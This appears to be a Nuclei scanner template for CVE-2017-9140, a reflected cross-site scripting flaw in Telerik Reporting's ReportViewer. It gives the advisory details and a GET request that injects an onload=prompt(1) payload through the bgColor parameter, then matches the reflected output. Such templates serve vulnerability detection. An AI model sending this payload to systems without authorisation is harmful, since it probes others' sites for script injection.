id: CVE-2017-9140 info: name: Reflected XSS - Telerik Reporting Module author: dhiyaneshDk severity: medium description: Cross-site scripting vulnerability in Telerik.ReportViewer.WebForms.dll in Telerik Reporting for ASP.NET WebForms Report Viewer control before R1 2017 SP2 (11.0.17.406) allows remote attackers to inject arbitrary web script or HTML via the bgColor parameter to Telerik.ReportViewer.axd. impact: | Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, potentially leading to session hijacking, defacement of web pages, or theft of sensitive information. remediation: Upgrade to application version 11.0.17.406 (2017 SP2) or later. reference: - https://www.veracode.com/blog/secure-development/anatomy-cross-site-scripting-flaw-telerik-reporting-module - https://nvd.nist.gov/vuln/detail/CVE-2017-9140 - https://www.veracode.com/blog/research/anatomy-cross-site-scripting-flaw-telerik-reporting-module - http://www.telerik.com/support/whats-new/reporting/release-history/telerik-reporting-r1-2017-sp2-(version-11-0-17-406) - https://knowledgebase.progress.com/articles/Article/Security-Advisory-for-Resolving-Security-vulnerabilities-September-2018 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2017-9140 cwe-id: CWE-79 epss-score: 0.00191 epss-percentile: 0.55758 cpe: cpe:2.3:a:progress:telerik_reporting:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: progress product: telerik_reporting tags: cve2017,cve,xss,telerik,progress http: - method: GET path: - '{{BaseURL}}/Telerik.ReportViewer.axd?optype=Parameters&bgColor=_000000%22onload=%22prompt(1)' matchers-condition: and matchers: - type: word words: - '#000000"onload="prompt(1)' - 'Telerik.ReportViewer.axd?name=Resources' condition: and - type: status status: - 200 # digest: 4b0a00483046022100e69bdcb3fa2b283c1b6182024ffdd266efd7457251b67234e56db326860d8c2b022100c6f67d7e4165debb3d19c617f22631630858768926f95b9f399c5a9980ab4302:922c64590222798bb761d5b6d8e72950